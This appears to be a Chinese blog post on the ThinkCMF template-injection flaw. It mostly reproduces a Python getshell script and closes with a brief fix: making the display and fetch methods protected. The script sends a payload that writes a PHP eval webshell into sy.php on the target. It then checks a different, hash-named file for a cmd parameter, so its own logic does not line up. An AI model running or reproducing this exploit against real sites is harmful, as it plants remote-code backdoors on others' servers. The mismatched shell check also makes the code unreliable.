eval 漏洞处理
Python3 攻击脚本
仓库地址:https://github.com/jas502n/ThinkCMF_getshell/tree/master
import requests,sys,json
def ThinkCMF_getshell(url):
if url[-1] == '/':
url = url[0:-1]
else:
url = url
vuln_url = url + R'''/index.php?a=fetch&content=<php>file_put_contents('sy.php','%3C%3Fphp%20eval%28%24_POST%5B%22x%22%5D%29%3B')</php>'''
r = requests.get(vuln_url)
response_str = json.dumps(r.headers.__dict__['_store'])
# if r.status_code == 200 and 'PHP' in response_str:
if r.status_code == 200:
print(r.headers.get('Server'))
print(r.headers.get('X-Powered-By'))
check_shell(url)
else:
print("No Exit ThinkCMF Vuln")
def check_shell(url):
shell_url = url + '/0a30e0d61182dbb7c1eed5135787fb84.php'
r = requests.get(shell_url)
if r.status_code == 200 and '0a30e0d61182dbb7c1eed5135787fb84' in r.content.decode():
print("\n>>>>>>>Shell url:")
print(url + "/0a30e0d61182dbb7c1eed5135787fb84.php?cmd=whoami")
# print url + "/0a30e0d61182dbb7c1eed5135787fb84.php?cmd=rm -rf 0a30e0d61182dbb7c1eed5135787fb84.php"
if __name__ == '__main__':
if len(sys.argv) != 2:
sys.exit("\n[+] python %s http://x.x.x.x/" % sys.argv[0])
else:
url = sys.argv[1]
ThinkCMF_getshell(url)
修复方法
将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 [email protected]
